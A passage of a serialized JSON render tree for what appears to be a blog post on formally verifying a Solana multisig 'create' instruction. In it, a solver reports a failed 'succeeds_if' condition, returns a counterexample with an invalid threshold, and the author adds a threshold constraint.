",{"type":26,"tag":137,"props":25554,"children":25555},{"style":5590},[25556],{"type":32,"value":289},{"type":26,"tag":137,"props":25558,"children":25559},{"style":6009},[25560],{"type":32,"value":23749},{"type":26,"tag":137,"props":25562,"children":25563},{"style":5590},[25564],{"type":32,"value":6072},{"type":26,"tag":137,"props":25566,"children":25567},{"style":6009},[25568],{"type":32,"value":25569},"SIZE_WITHOUT_MEMBERS",{"type":26,"tag":137,"props":25571,"children":25572},{"style":5590},[25573],{"type":32,"value":11491},{"type":26,"tag":137,"props":25575,"children":25576},{"style":5601},[25577],{"type":32,"value":25578}," (members",{"type":26,"tag":137,"props":25580,"children":25581},{"style":5590},[25582],{"type":32,"value":470},{"type":26,"tag":137,"props":25584,"children":25585},{"style":5601},[25586],{"type":32,"value":23614},{"type":26,"tag":137,"props":25588,"children":25589},{"style":5590},[25590],{"type":32,"value":7152},{"type":26,"tag":137,"props":25592,"children":25593},{"style":5601},[25594],{"type":32,"value":25595}," 32),\n",{"type":26,"tag":137,"props":25597,"children":25598},{"class":5559,"line":5891},[25599,25604,25608,25613,25618,25622,25626,25631,25636,25641],{"type":26,"tag":137,"props":25600,"children":25601},{"style":5601},[25602],{"type":32,"value":25603},"        seeds ",{"type":26,"tag":137,"props":25605,"children":25606},{"style":5590},[25607],{"type":32,"value":289},{"type":26,"tag":137,"props":25609,"children":25610},{"style":5601},[25611],{"type":32,"value":25612}," [",{"type":26,"tag":137,"props":25614,"children":25615},{"style":6837},[25616],{"type":32,"value":25617},"b\"squad\"",{"type":26,"tag":137,"props":25619,"children":25620},{"style":5601},[25621],{"type":32,"value":25447},{"type":26,"tag":137,"props":25623,"children":25624},{"style":5590},[25625],{"type":32,"value":470},{"type":26,"tag":137,"props":25627,"children":25628},{"style":5601},[25629],{"type":32,"value":25630},"as_ref(), ",{"type":26,"tag":137,"props":25632,"children":25633},{"style":6837},[25634],{"type":32,"value":25635},"b\"multisig\"",{"type":26,"tag":137,"props":25637,"children":25638},{"style":5601},[25639],{"type":32,"value":25640},"], ",{"type":26,"tag":137,"props":25642,"children":25643},{"style":5584},[25644],{"type":32,"value":25645},"bump\n",{"type":26,"tag":137,"props":25647,"children":25648},{"class":5559,"line":5909},[25649],{"type":26,"tag":137,"props":25650,"children":25651},{"style":5601},[25652],{"type":32,"value":25653},"    )]\n",{"type":26,"tag":137,"props":25655,"children":25656},{"class":5559,"line":5930},[25657,25661,25666,25670,25675,25679,25683,25687,25691],{"type":26,"tag":137,"props":25658,"children":25659},{"style":5573},[25660],{"type":32,"value":23436},{"type":26,"tag":137,"props":25662,"children":25663},{"style":5584},[25664],{"type":32,"value":25665}," multisig",{"type":26,"tag":137,"props":25667,"children":25668},{"style":5590},[25669],{"type":32,"value":7072},{"type":26,"tag":137,"props":25671,"children":25672},{"style":6009},[25673],{"type":32,"value":25674}," Account",{"type":26,"tag":137,"props":25676,"children":25677},{"style":5601},[25678],{"type":32,"value":25502},{"type":26,"tag":137,"props":25680,"children":25681},{"style":6009},[25682],{"type":32,"value":25507},{"type":26,"tag":137,"props":25684,"children":25685},{"style":5601},[25686],{"type":32,"value":1108},{"type":26,"tag":137,"props":25688,"children":25689},{"style":6009},[25690],{"type":32,"value":25321},{"type":26,"tag":137,"props":25692,"children":25693},{"style":5601},[25694],{"type":32,"value":8723},{"type":26,"tag":137,"props":25696,"children":25697},{"class":5559,"line":5939},[25698],{"type":26,"tag":137,"props":25699,"children":25700},{"emptyLinePlaceholder":18},[25701],{"type":32,"value":6276},{"type":26,"tag":137,"props":25703,"children":25704},{"class":5559,"line":6191},[25705,25710,25714],{"type":26,"tag":137,"props":25706,"children":25707},{"style":5601},[25708],{"type":32,"value":25709},"    #[account(",{"type":26,"tag":137,"props":25711,"children":25712},{"style":5573},[25713],{"type":32,"value":6325},{"type":26,"tag":137,"props":25715,"children":25716},{"style":5601},[25717],{"type":32,"value":22852},{"type":26,"tag":137,"props":25719,"children":25720},{"class":5559,"line":6208},[25721,25725,25730,25734,25739,25743,25747],{"type":26,"tag":137,"props":25722,"children":25723},{"style":5573},[25724],{"type":32,"value":23436},{"type":26,"tag":137,"props":25726,"children":25727},{"style":5584},[25728],{"type":32,"value":25729}," creator",{"type":26,"tag":137,"props":25731,"children":25732},{"style":5590},[25733],{"type":32,"value":7072},{"type":26,"tag":137,"props":25735,"children":25736},{"style":6009},[25737],{"type":32,"value":25738}," Signer",{"type":26,"tag":137,"props":25740,"children":25741},{"style":5601},[25742],{"type":32,"value":25502},{"type":26,"tag":137,"props":25744,"children":25745},{"style":6009},[25746],{"type":32,"value":25507},{"type":26,"tag":137,"props":25748,"children":25749},{"style":5601},[25750],{"type":32,"value":8723},{"type":26,"tag":137,"props":25752,"children":25753},{"class":5559,"line":6225},[25754,25758,25763,25767,25772,25776,25780,25784,25789],{"type":26,"tag":137,"props":25755,"children":25756},{"style":5573},[25757],{"type":32,"value":23436},{"type":26,"tag":137,"props":25759,"children":25760},{"style":5584},[25761],{"type":32,"value":25762}," system_program",{"type":26,"tag":137,"props":25764,"children":25765},{"style":5590},[25766],{"type":32,"value":7072},{"type":26,"tag":137,"props":25768,"children":25769},{"style":6009},[25770],{"type":32,"value":25771}," Program",{"type":26,"tag":137,"props":25773,"children":25774},{"style":5601},[25775],{"type":32,"value":25502},{"type":26,"tag":137,"props":25777,"children":25778},{"style":6009},[25779],{"type":32,"value":25507},{"type":26,"tag":137,"props":25781,"children":25782},{"style":5601},[25783],{"type":32,"value":1108},{"type":26,"tag":137,"props":25785,"children":25786},{"style":6009},[25787],{"type":32,"value":25788},"System",{"type":26,"tag":137,"props":25790,"children":25791},{"style":5601},[25792],{"type":32,"value":8723},{"type":26,"tag":137,"props":25794,"children":25795},{"class":5559,"line":6238},[25796],{"type":26,"tag":137,"props":25797,"children":25798},{"style":5601},[25799],{"type":32,"value":6507},{"type":26,"tag":137,"props":25801,"children":25802},{"class":5559,"line":6247},[25803],{"type":26,"tag":137,"props":25804,"children":25805},{"emptyLinePlaceholder":18},[25806],{"type":32,"value":6276},{"type":26,"tag":137,"props":25808,"children":25809},{"class":5559,"line":6270},[25810,25814,25818,25822],{"type":26,"tag":137,"props":25811,"children":25812},{"style":5573},[25813],{"type":32,"value":16281},{"type":26,"tag":137,"props":25815,"children":25816},{"style":5573},[25817],{"type":32,"value":16286},{"type":26,"tag":137,"props":25819,"children":25820},{"style":5682},[25821],{"type":32,"value":9696},{"type":26,"tag":137,"props":25823,"children":25824},{"style":5601},[25825],{"type":32,"value":6054},{"type":26,"tag":137,"props":25827,"children":25828},{"class":5559,"line":6279},[25829,25833,25837,25841,25845,25850],{"type":26,"tag":137,"props":25830,"children":25831},{"style":5584},[25832],{"type":32,"value":22817},{"type":26,"tag":137,"props":25834,"children":25835},{"style":5590},[25836],{"type":32,"value":7072},{"type":26,"tag":137,"props":25838,"children":25839},{"style":6009},[25840],{"type":32,"value":22883},{"type":26,"tag":137,"props":25842,"children":25843},{"style":5601},[25844],{"type":32,"value":8391},{"type":26,"tag":137,"props":25846,"children":25847},{"style":6009},[25848],{"type":32,"value":25849},"Create",{"type":26,"tag":137,"props":25851,"children":25852},{"style":5601},[25853],{"type":32,"value":8723},{"type":26,"tag":137,"props":25855,"children":25856},{"class":5559,"line":6288},[25857,25862,25866,25870],{"type":26,"tag":137,"props":25858,"children":25859},{"style":5584},[25860],{"type":32,"value":25861},"    threshold",{"type":26,"tag":137,"props":25863,"children":25864},{"style":5590},[25865],{"type":32,"value":7072},{"type":26,"tag":137,"props":25867,"children":25868},{"style":6009},[25869],{"type":32,"value":23623},{"type":26,"tag":137,"props":25871,"children":25872},{"style":5601},[25873],{"type":32,"value":6099},{"type":26,"tag":137,"props":25875,"children":25876},{"class":5559,"line":6355},[25877,25882,25886,25890],{"type":26,"tag":137,"props":25878,"children":25879},{"style":5584},[25880],{"type":32,"value":25881},"    create_key",{"type":26,"tag":137,"props":25883,"children":25884},{"style":5590},[25885],{"type":32,"value":7072},{"type":26,"tag":137,"props":25887,"children":25888},{"style":6009},[25889],{"type":32,"value":23450},{"type":26,"tag":137,"props":25891,"children":25892},{"style":5601},[25893],{"type":32,"value":6099},{"type":26,"tag":137,"props":25895,"children":25896},{"class":5559,"line":6363},[25897,25902,25906,25910,25914,25918],{"type":26,"tag":137,"props":25898,"children":25899},{"style":5584},[25900],{"type":32,"value":25901},"    members",{"type":26,"tag":137,"props":25903,"children":25904},{"style":5590},[25905],{"type":32,"value":7072},{"type":26,"tag":137,"props":25907,"children":25908},{"style":6009},[25909],{"type":32,"value":23982},{"type":26,"tag":137,"props":25911,"children":25912},{"style":5601},[25913],{"type":32,"value":8391},{"type":26,"tag":137,"props":25915,"children":25916},{"style":6009},[25917],{"type":32,"value":23991},{"type":26,"tag":137,"props":25919,"children":25920},{"style":5601},[25921],{"type":32,"value":8723},{"type":26,"tag":137,"props":25923,"children":25924},{"class":5559,"line":6393},[25925,25929,25933,25937],{"type":26,"tag":137,"props":25926,"children":25927},{"style":5601},[25928],{"type":32,"value":5671},{"type":26,"tag":137,"props":25930,"children":25931},{"style":5590},[25932],{"type":32,"value":16348},{"type":26,"tag":137,"props":25934,"children":25935},{"style":6009},[25936],{"type":32,"value":16353},{"type":26,"tag":137,"props":25938,"children":25939},{"style":5601},[25940],{"type":32,"value":22925},{"type":26,"tag":137,"props":25942,"children":25943},{"class":5559,"line":6401},[25944],{"type":26,"tag":137,"props":25945,"children":25946},{"style":5564},[25947],{"type":32,"value":25948},"    // sort the members and remove duplicates\n",{"type":26,"tag":137,"props":25950,"children":25951},{"class":5559,"line":6433},[25952,25956,25960,25965,25969,25973],{"type":26,"tag":137,"props":25953,"children":25954},{"style":5573},[25955],{"type":32,"value":5576},{"type":26,"tag":137,"props":25957,"children":25958},{"style":5573},[25959],{"type":32,"value":5581},{"type":26,"tag":137,"props":25961,"children":25962},{"style":5584},[25963],{"type":32,"value":25964}," members",{"type":26,"tag":137,"props":25966,"children":25967},{"style":5590},[25968],{"type":32,"value":5593},{"type":26,"tag":137,"props":25970,"children":25971},{"style":5584},[25972],{"type":32,"value":25964},{"type":26,"tag":137,"props":25974,"children":25975},{"style":5601},[25976],{"type":32,"value":5604},{"type":26,"tag":137,"props":25978,"children":25979},{"class":5559,"line":6441},[25980,25984,25988,25993],{"type":26,"tag":137,"props":25981,"children":25982},{"style":5584},[25983],{"type":32,"value":25901},{"type":26,"tag":137,"props":25985,"children":25986},{"style":5590},[25987],{"type":32,"value":470},{"type":26,"tag":137,"props":25989,"children":25990},{"style":5682},[25991],{"type":32,"value":25992},"sort",{"type":26,"tag":137,"props":25994,"children":25995},{"style":5601},[25996],{"type":32,"value":6267},{"type":26,"tag":137,"props":25998,"children":25999},{"class":5559,"line":6501},[26000,26004,26008,26013],{"type":26,"tag":137,"props":26001,"children":26002},{"style":5584},[26003],{"type":32,"value":25901},{"type":26,"tag":137,"props":26005,"children":26006},{"style":5590},[26007],{"type":32,"value":470},{"type":26,"tag":137,"props":26009,"children":26010},{"style":5682},[26011],{"type":32,"value":26012},"dedup",{"type":26,"tag":137,"props":26014,"children":26015},{"style":5601},[26016],{"type":32,"value":6267},{"type":26,"tag":137,"props":26018,"children":26019},{"class":5559,"line":11634},[26020],{"type":26,"tag":137,"props":26021,"children":26022},{"emptyLinePlaceholder":18},[26023],{"type":32,"value":6276},{"type":26,"tag":137,"props":26025,"children":26026},{"class":5559,"line":11652},[26027],{"type":26,"tag":137,"props":26028,"children":26029},{"style":5564},[26030],{"type":32,"value":26031},"    // check we don't exceed u16\n",{"type":26,"tag":137,"props":26033,"children":26034},{"class":5559,"line":11697},[26035,26039,26044,26048,26052,26056,26060],{"type":26,"tag":137,"props":26036,"children":26037},{"style":5573},[26038],{"type":32,"value":5576},{"type":26,"tag":137,"props":26040,"children":26041},{"style":5584},[26042],{"type":32,"value":26043}," total_members",{"type":26,"tag":137,"props":26045,"children":26046},{"style":5590},[26047],{"type":32,"value":5593},{"type":26,"tag":137,"props":26049,"children":26050},{"style":5584},[26051],{"type":32,"value":25964},{"type":26,"tag":137,"props":26053,"children":26054},{"style":5590},[26055],{"type":32,"value":470},{"type":26,"tag":137,"props":26057,"children":26058},{"style":5682},[26059],{"type":32,"value":11727},{"type":26,"tag":137,"props":26061,"children":26062},{"style":5601},[26063],{"type":32,"value":6267},{"type":26,"tag":137,"props":26065,"children":26066},{"class":5559,"line":11803},[26067,26071,26075,26079,26083],{"type":26,"tag":137,"props":26068,"children":26069},{"style":5610},[26070],{"type":32,"value":14870},{"type":26,"tag":137,"props":26072,"children":26073},{"style":5584},[26074],{"type":32,"value":26043},{"type":26,"tag":137,"props":26076,"children":26077},{"style":5590},[26078],{"type":32,"value":11305},{"type":26,"tag":137,"props":26080,"children":26081},{"style":5626},[26082],{"type":32,"value":7104},{"type":26,"tag":137,"props":26084,"children":26085},{"style":5601},[26086],{"type":32,"value":5875},{"type":26,"tag":137,"props":26088,"children":26090},{"class":5559,"line":26089},31,[26091,26095,26100,26104,26109,26113,26118],{"type":26,"tag":137,"props":26092,"children":26093},{"style":5610},[26094],{"type":32,"value":18336},{"type":26,"tag":137,"props":26096,"children":26097},{"style":5682},[26098],{"type":32,"value":26099}," err!",{"type":26,"tag":137,"props":26101,"children":26102},{"style":5601},[26103],{"type":32,"value":165},{"type":26,"tag":137,"props":26105,"children":26106},{"style":6009},[26107],{"type":32,"value":26108},"MsError",{"type":26,"tag":137,"props":26110,"children":26111},{"style":5590},[26112],{"type":32,"value":6072},{"type":26,"tag":137,"props":26114,"children":26115},{"style":6009},[26116],{"type":32,"value":26117},"EmptyMembers",{"type":26,"tag":137,"props":26119,"children":26120},{"style":5601},[26121],{"type":32,"value":6430},{"type":26,"tag":137,"props":26123,"children":26125},{"class":5559,"line":26124},32,[26126],{"type":26,"tag":137,"props":26127,"children":26128},{"style":5601},[26129],{"type":32,"value":5945},{"type":26,"tag":137,"props":26131,"children":26133},{"class":5559,"line":26132},33,[26134],{"type":26,"tag":137,"props":26135,"children":26136},{"emptyLinePlaceholder":18},[26137],{"type":32,"value":6276},{"type":26,"tag":137,"props":26139,"children":26141},{"class":5559,"line":26140},34,[26142],{"type":26,"tag":137,"props":26143,"children":26144},{"style":5564},[26145],{"type":32,"value":26146},"    // make sure we don't exceed u16 on first call\n",{"type":26,"tag":137,"props":26148,"children":26150},{"class":5559,"line":26149},35,[26151,26155,26159,26163,26167,26171,26175,26180,26184],{"type":26,"tag":137,"props":26152,"children":26153},{"style":5610},[26154],{"type":32,"value":14870},{"type":26,"tag":137,"props":26156,"children":26157},{"style":5584},[26158],{"type":32,"value":26043},{"type":26,"tag":137,"props":26160,"children":26161},{"style":5590},[26162],{"type":32,"value":16785},{"type":26,"tag":137,"props":26164,"children":26165},{"style":6009},[26166],{"type":32,"value":16322},{"type":26,"tag":137,"props":26168,"children":26169},{"style":5590},[26170],{"type":32,"value":6072},{"type":26,"tag":137,"props":26172,"children":26173},{"style":5682},[26174],{"type":32,"value":22066},{"type":26,"tag":137,"props":26176,"children":26177},{"style":5601},[26178],{"type":32,"value":26179},"(u16",{"type":26,"tag":137,"props":26181,"children":26182},{"style":5590},[26183],{"type":32,"value":6072},{"type":26,"tag":137,"props":26185,"children":26186},{"style":5601},[26187],{"type":32,"value":26188},"MAX) {\n",{"type":26,"tag":137,"props":26190,"children":26192},{"class":5559,"line":26191},36,[26193,26197,26201,26205,26209,26213,26218],{"type":26,"tag":137,"props":26194,"children":26195},{"style":5610},[26196],{"type":32,"value":18336},{"type":26,"tag":137,"props":26198,"children":26199},{"style":5682},[26200],{"type":32,"value":26099},{"type":26,"tag":137,"props":26202,"children":26203},{"style":5601},[26204],{"type":32,"value":165},{"type":26,"tag":137,"props":26206,"children":26207},{"style":6009},[26208],{"type":32,"value":26108},{"type":26,"tag":137,"props":26210,"children":26211},{"style":5590},[26212],{"type":32,"value":6072},{"type":26,"tag":137,"props":26214,"children":26215},{"style":6009},[26216],{"type":32,"value":26217},"MaxMembersReached",{"type":26,"tag":137,"props":26219,"children":26220},{"style":5601},[26221],{"type":32,"value":6430},{"type":26,"tag":137,"props":26223,"children":26225},{"class":5559,"line":26224},37,[26226],{"type":26,"tag":137,"props":26227,"children":26228},{"style":5601},[26229],{"type":32,"value":5945},{"type":26,"tag":137,"props":26231,"children":26233},{"class":5559,"line":26232},38,[26234],{"type":26,"tag":137,"props":26235,"children":26236},{"emptyLinePlaceholder":18},[26237],{"type":32,"value":6276},{"type":26,"tag":137,"props":26239,"children":26241},{"class":5559,"line":26240},39,[26242],{"type":26,"tag":137,"props":26243,"children":26244},{"style":5564},[26245],{"type":32,"value":26246},"    // make sure threshold is valid\n",{"type":26,"tag":137,"props":26248,"children":26250},{"class":5559,"line":26249},40,[26251,26255,26259,26263,26267,26271,26275,26280,26284,26289,26293,26297,26301,26305,26309,26314,26319],{"type":26,"tag":137,"props":26252,"children":26253},{"style":5610},[26254],{"type":32,"value":14870},{"type":26,"tag":137,"props":26256,"children":26257},{"style":6009},[26258],{"type":32,"value":16322},{"type":26,"tag":137,"props":26260,"children":26261},{"style":5590},[26262],{"type":32,"value":6072},{"type":26,"tag":137,"props":26264,"children":26265},{"style":5682},[26266],{"type":32,"value":22066},{"type":26,"tag":137,"props":26268,"children":26269},{"style":5601},[26270],{"type":32,"value":165},{"type":26,"tag":137,"props":26272,"children":26273},{"style":5584},[26274],{"type":32,"value":25329},{"type":26,"tag":137,"props":26276,"children":26277},{"style":5601},[26278],{"type":32,"value":26279},") \u003C ",{"type":26,"tag":137,"props":26281,"children":26282},{"style":5626},[26283],{"type":32,"value":878},{"type":26,"tag":137,"props":26285,"children":26286},{"style":5590},[26287],{"type":32,"value":26288}," ||",{"type":26,"tag":137,"props":26290,"children":26291},{"style":6009},[26292],{"type":32,"value":16322},{"type":26,"tag":137,"props":26294,"children":26295},{"style":5590},[26296],{"type":32,"value":6072},{"type":26,"tag":137,"props":26298,"children":26299},{"style":5682},[26300],{"type":32,"value":22066},{"type":26,"tag":137,"props":26302,"children":26303},{"style":5601},[26304],{"type":32,"value":165},{"type":26,"tag":137,"props":26306,"children":26307},{"style":5584},[26308],{"type":32,"value":25329},{"type":26,"tag":137,"props":26310,"children":26311},{"style":5601},[26312],{"type":32,"value":26313},") > ",{"type":26,"tag":137,"props":26315,"children":26316},{"style":5584},[26317],{"type":32,"value":26318},"total_members",{"type":26,"tag":137,"props":26320,"children":26321},{"style":5601},[26322],{"type":32,"value":5875},{"type":26,"tag":137,"props":26324,"children":26326},{"class":5559,"line":26325},41,[26327,26331,26335,26339,26343,26347,26352],{"type":26,"tag":137,"props":26328,"children":26329},{"style":5610},[26330],{"type":32,"value":18336},{"type":26,"tag":137,"props":26332,"children":26333},{"style":5682},[26334],{"type":32,"value":26099},{"type":26,"tag":137,"props":26336,"children":26337},{"style":5601},[26338],{"type":32,"value":165},{"type":26,"tag":137,"props":26340,"children":26341},{"style":6009},[26342],{"type":32,"value":26108},{"type":26,"tag":137,"props":26344,"children":26345},{"style":5590},[26346],{"type":32,"value":6072},{"type":26,"tag":137,"props":26348,"children":26349},{"style":6009},[26350],{"type":32,"value":26351},"InvalidThreshold",{"type":26,"tag":137,"props":26353,"children":26354},{"style":5601},[26355],{"type":32,"value":6430},{"type":26,"tag":137,"props":26357,"children":26359},{"class":5559,"line":26358},42,[26360],{"type":26,"tag":137,"props":26361,"children":26362},{"style":5601},[26363],{"type":32,"value":5945},{"type":26,"tag":137,"props":26365,"children":26367},{"class":5559,"line":26366},43,[26368],{"type":26,"tag":137,"props":26369,"children":26370},{"emptyLinePlaceholder":18},[26371],{"type":32,"value":6276},{"type":26,"tag":137,"props":26373,"children":26375},{"class":5559,"line":26374},44,[26376,26380,26384,26388,26392,26397,26401,26405],{"type":26,"tag":137,"props":26377,"children":26378},{"style":5584},[26379],{"type":32,"value":22817},{"type":26,"tag":137,"props":26381,"children":26382},{"style":5590},[26383],{"type":32,"value":470},{"type":26,"tag":137,"props":26385,"children":26386},{"style":5601},[26387],{"type":32,"value":17266},{"type":26,"tag":137,"props":26389,"children":26390},{"style":5590},[26391],{"type":32,"value":470},{"type":26,"tag":137,"props":26393,"children":26394},{"style":5601},[26395],{"type":32,"value":26396},"multisig",{"type":26,"tag":137,"props":26398,"children":26399},{"style":5590},[26400],{"type":32,"value":470},{"type":26,"tag":137,"props":26402,"children":26403},{"style":5682},[26404],{"type":32,"value":23334},{"type":26,"tag":137,"props":26406,"children":26407},{"style":5601},[26408],{"type":32,"value":6054},{"type":26,"tag":137,"props":26410,"children":26412},{"class":5559,"line":26411},45,[26413,26418],{"type":26,"tag":137,"props":26414,"children":26415},{"style":5584},[26416],{"type":32,"value":26417},"        threshold",{"type":26,"tag":137,"props":26419,"children":26420},{"style":5601},[26421],{"type":32,"value":6099},{"type":26,"tag":137,"props":26423,"children":26425},{"class":5559,"line":26424},46,[26426,26431],{"type":26,"tag":137,"props":26427,"children":26428},{"style":5584},[26429],{"type":32,"value":26430},"        create_key",{"type":26,"tag":137,"props":26432,"children":26433},{"style":5601},[26434],{"type":32,"value":6099},{"type":26,"tag":137,"props":26436,"children":26438},{"class":5559,"line":26437},47,[26439,26444],{"type":26,"tag":137,"props":26440,"children":26441},{"style":5584},[26442],{"type":32,"value":26443},"        members",{"type":26,"tag":137,"props":26445,"children":26446},{"style":5601},[26447],{"type":32,"value":6099},{"type":26,"tag":137,"props":26449,"children":26451},{"class":5559,"line":26450},48,[26452,26456,26460,26464,26469,26473,26477,26481,26486,26490,26494,26498],{"type":26,"tag":137,"props":26453,"children":26454},{"style":5590},[26455],{"type":32,"value":10336},{"type":26,"tag":137,"props":26457,"children":26458},{"style":5584},[26459],{"type":32,"value":22874},{"type":26,"tag":137,"props":26461,"children":26462},{"style":5590},[26463],{"type":32,"value":470},{"type":26,"tag":137,"props":26465,"children":26466},{"style":5601},[26467],{"type":32,"value":26468},"bumps",{"type":26,"tag":137,"props":26470,"children":26471},{"style":5590},[26472],{"type":32,"value":470},{"type":26,"tag":137,"props":26474,"children":26475},{"style":5682},[26476],{"type":32,"value":18944},{"type":26,"tag":137,"props":26478,"children":26479},{"style":5601},[26480],{"type":32,"value":165},{"type":26,"tag":137,"props":26482,"children":26483},{"style":6837},[26484],{"type":32,"value":26485},"\"multisig\"",{"type":26,"tag":137,"props":26487,"children":26488},{"style":5601},[26489],{"type":32,"value":200},{"type":26,"tag":137,"props":26491,"children":26492},{"style":5590},[26493],{"type":32,"value":470},{"type":26,"tag":137,"props":26495,"children":26496},{"style":5682},[26497],{"type":32,"value":6262},{"type":26,"tag":137,"props":26499,"children":26500},{"style":5601},[26501],{"type":32,"value":6082},{"type":26,"tag":137,"props":26503,"children":26505},{"class":5559,"line":26504},49,[26506],{"type":26,"tag":137,"props":26507,"children":26508},{"style":5601},[26509],{"type":32,"value":26510},"    )\n",{"type":26,"tag":137,"props":26512,"children":26514},{"class":5559,"line":26513},50,[26515],{"type":26,"tag":137,"props":26516,"children":26517},{"style":5601},[26518],{"type":32,"value":6507},{"type":26,"tag":35,"props":26520,"children":26521},{},[26522,26524,26529,26531,26536],{"type":32,"value":26523},"We can start by testing an empty ",{"type":26,"tag":130,"props":26525,"children":26527},{"className":26526},[],[26528],{"type":32,"value":22748},{"type":32,"value":26530}," (this will default to ",{"type":26,"tag":130,"props":26532,"children":26534},{"className":26533},[],[26535],{"type":32,"value":146},{"type":32,"value":26537},"):",{"type":26,"tag":5512,"props":26539,"children":26541},{"code":26540,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if()]\npub fn create(...) { ... }\n",[26542],{"type":26,"tag":130,"props":26543,"children":26544},{"__ignoreMap":7},[26545,26553],{"type":26,"tag":137,"props":26546,"children":26547},{"class":5559,"line":5560},[26548],{"type":26,"tag":137,"props":26549,"children":26550},{"style":5601},[26551],{"type":32,"value":26552},"#[succeeds_if()]\n",{"type":26,"tag":137,"props":26554,"children":26555},{"class":5559,"line":5412},[26556,26560,26564,26568,26572,26576,26581,26585],{"type":26,"tag":137,"props":26557,"children":26558},{"style":5573},[26559],{"type":32,"value":16281},{"type":26,"tag":137,"props":26561,"children":26562},{"style":5573},[26563],{"type":32,"value":16286},{"type":26,"tag":137,"props":26565,"children":26566},{"style":5682},[26567],{"type":32,"value":9696},{"type":26,"tag":137,"props":26569,"children":26570},{"style":5601},[26571],{"type":32,"value":165},{"type":26,"tag":137,"props":26573,"children":26574},{"style":5590},[26575],{"type":32,"value":12180},{"type":26,"tag":137,"props":26577,"children":26578},{"style":5601},[26579],{"type":32,"value":26580},") { ",{"type":26,"tag":137,"props":26582,"children":26583},{"style":5590},[26584],{"type":32,"value":12180},{"type":26,"tag":137,"props":26586,"children":26587},{"style":5601},[26588],{"type":32,"value":12185},{"type":26,"tag":35,"props":26590,"children":26591},{},[26592],{"type":32,"value":26593},"Running the solver, we get:",{"type":26,"tag":5512,"props":26595,"children":26597},{"code":26596},"...\nVERIFICATION:- FAILED\nVerification Time: 6.404167s\n",[26598],{"type":26,"tag":130,"props":26599,"children":26600},{"__ignoreMap":7},[26601],{"type":32,"value":26596},{"type":26,"tag":35,"props":26603,"children":26604},{},[26605,26607,26612],{"type":32,"value":26606},"This means that ",{"type":26,"tag":130,"props":26608,"children":26610},{"className":26609},[],[26611],{"type":32,"value":146},{"type":32,"value":26613}," does not imply that the function will succeed (which is expected looking at the implementation above).",{"type":26,"tag":35,"props":26615,"children":26616},{},[26617],{"type":32,"value":26618},"We can ask the solver to produce a counterexample:",{"type":26,"tag":5512,"props":26620,"children":26622},{"code":26621},"threshold: 33764\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[26623],{"type":26,"tag":130,"props":26624,"children":26625},{"__ignoreMap":7},[26626],{"type":32,"value":26621},{"type":26,"tag":35,"props":26628,"children":26629},{},[26630],{"type":32,"value":26631},"In this case, we can see that the threshold is invalid; it should not be larger than the number of members.",{"type":26,"tag":35,"props":26633,"children":26634},{},[26635],{"type":26,"tag":762,"props":26636,"children":26637},{},[26638,26640,26646],{"type":32,"value":26639},"Note also that the verifier decided to use a ",{"type":26,"tag":130,"props":26641,"children":26643},{"className":26642},[],[26644],{"type":32,"value":26645},"SparseVec",{"type":32,"value":26647}," which is one of our custom vec implementations. In this case, the code we are verifying doesn't actually read or write to the vector and so we can model it simply as a symbolic size (with no data).",{"type":26,"tag":35,"props":26649,"children":26650},{},[26651],{"type":26,"tag":762,"props":26652,"children":26653},{},[26654,26656,26661,26662,26668,26670,26675,26677,26682],{"type":32,"value":26655},"Using a sparse vec rather than a concrete vec is generally preferred as it speeds up computation and allows us to model arbitrarily sized vecs. ",{"type":26,"tag":130,"props":26657,"children":26659},{"className":26658},[],[26660],{"type":32,"value":6416},{"type":32,"value":3339},{"type":26,"tag":130,"props":26663,"children":26665},{"className":26664},[],[26666],{"type":32,"value":26667},"pop",{"type":32,"value":26669}," are stubbed out to simply panic for the ",{"type":26,"tag":130,"props":26671,"children":26673},{"className":26672},[],[26674],{"type":32,"value":26645},{"type":32,"value":26676}," and if this code tried to do that we would fall back to the concrete ",{"type":26,"tag":130,"props":26678,"children":26680},{"className":26679},[],[26681],{"type":32,"value":19804},{"type":32,"value":26683}," type.",{"type":26,"tag":35,"props":26685,"children":26686},{},[26687],{"type":32,"value":26688},"We can add this to our constraint and try again:",{"type":26,"tag":5512,"props":26690,"children":26692},{"code":26691,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n)]\npub fn create(...) { ... }\n",[26693],{"type":26,"tag":130,"props":26694,"children":26695},{"__ignoreMap":7},[26696,26704,26741,26748],{"type":26,"tag":137,"props":26697,"children":26698},{"class":5559,"line":5560},[26699],{"type":26,"tag":137,"props":26700,"children":26701},{"style":5601},[26702],{"type":32,"value":26703},"#[succeeds_if(\n",{"type":26,"tag":137,"props":26705,"children":26706},{"class":5559,"line":5412},[26707,26712,26716,26720,26724,26728,26732,26736],{"type":26,"tag":137,"props":26708,"children":26709},{"style":5601},[26710],{"type":32,"value":26711},"    (threshold ",{"type":26,"tag":137,"props":26713,"children":26714},{"style":5573},[26715],{"type":32,"value":11428},{"type":26,"tag":137,"props":26717,"children":26718},{"style":6009},[26719],{"type":32,"value":16322},{"type":26,"tag":137,"props":26721,"children":26722},{"style":5601},[26723],{"type":32,"value":5671},{"type":26,"tag":137,"props":26725,"children":26726},{"style":5590},[26727],{"type":32,"value":22007},{"type":26,"tag":137,"props":26729,"children":26730},{"style":5601},[26731],{"type":32,"value":25964},{"type":26,"tag":137,"props":26733,"children":26734},{"style":5590},[26735],{"type":32,"value":470},{"type":26,"tag":137,"props":26737,"children":26738},{"style":5601},[26739],{"type":32,"value":26740},"len()\n",{"type":26,"tag":137,"props":26742,"children":26743},{"class":5559,"line":5417},[26744],{"type":26,"tag":137,"props":26745,"children":26746},{"style":5601},[26747],{"type":32,"value":22852},{"type":26,"tag":137,"props":26749,"children":26750},{"class":5559,"line":5642},[26751,26755,26759,26763,26767,26771,26775,26779],{"type":26,"tag":137,"props":26752,"children":26753},{"style":5573},[26754],{"type":32,"value":16281},{"type":26,"tag":137,"props":26756,"children":26757},{"style":5573},[26758],{"type":32,"value":16286},{"type":26,"tag":137,"props":26760,"children":26761},{"style":5682},[26762],{"type":32,"value":9696},{"type":26,"tag":137,"props":26764,"children":26765},{"style":5601},[26766],{"type":32,"value":165},{"type":26,"tag":137,"props":26768,"children":26769},{"style":5590},[26770],{"type":32,"value":12180},{"type":26,"tag":137,"props":26772,"children":26773},{"style":5601},[26774],{"type":32,"value":26580},{"type":26,"tag":137,"props":26776,"children":26777},{"style":5590},[26778],{"type":32,"value":12180},{"type":26,"tag":137,"props":26780,"children":26781},{"style":5601}